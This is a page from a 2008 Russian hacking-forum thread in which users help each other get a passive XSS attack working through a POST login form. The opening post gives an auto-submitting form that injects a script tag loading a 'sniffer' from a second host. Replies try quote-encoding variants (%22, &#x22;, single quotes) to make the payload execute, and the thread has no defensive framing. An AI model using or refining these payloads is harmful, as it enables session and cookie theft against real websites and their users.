Форум АНТИЧАТ
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   Пасивная Xss через Post (https://forum.antichat.xyz/showthread.php?t=58568)

Student :) 14.01.2008 03:34
Пасивная Xss через Post
 
Привет всем со старым НГ!!
вот вопрос
PHP код:
<form name="authForm" id="authForm" method="post" action="http://site.ru/login.php">
<input type="hidden" name="Login" value=""><script src="http://site2.ru/snifer.php"></script>">
<input type="hidden" name="securityCode" value="0000">
<input type="hidden" name="Submit.x" value="67">
<input type="hidden" name="Submit.y" value="16">
<script language="JavaScript" type="text/javascript">document.authForm.submit();</script>
</form> 
ответ есть но не срабатывает "><script src="http://site2.ru/snifer.php">
нужно обновить страницу тогда работает

может както подругому зделать?

bul.666 14.01.2008 03:42
Цитата:
value=""><script src="http://site2.ru/snifer.php"></script>">
Попробуй вместо " поставить %22

Student :) 14.01.2008 03:43
а как быть?

просто в качестве логина надо сылку вида "><script src="http://site2.ru/snifer.php">

bul.666 14.01.2008 03:46
%22><script src=http://site2.ru/snifer.php></script>
Попробуй так

Student :) 14.01.2008 03:48
так не работает

Student :) 14.01.2008 03:50
в поле логин %22><script src=http://site2.ru/snifer.php></script>

Student :) 14.01.2008 03:51
так работает &#x22;><script src=http://site2.ru/snifer.php></script>!!!

но надо обновить страницу чтоб выполнился <script src=http://site2.ru/snifer.php></script>

bul.666 14.01.2008 03:51
Ой торможу =)
value='"><script src=http://site2.ru/snifer.php></script>'>

Student :) 14.01.2008 12:09
Помогите решить с меня +

Isis 14.01.2008 12:11
Юзай FireBug в фф, там нажать применить и обновишь страницу, все ок будет


Время: 00:47
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице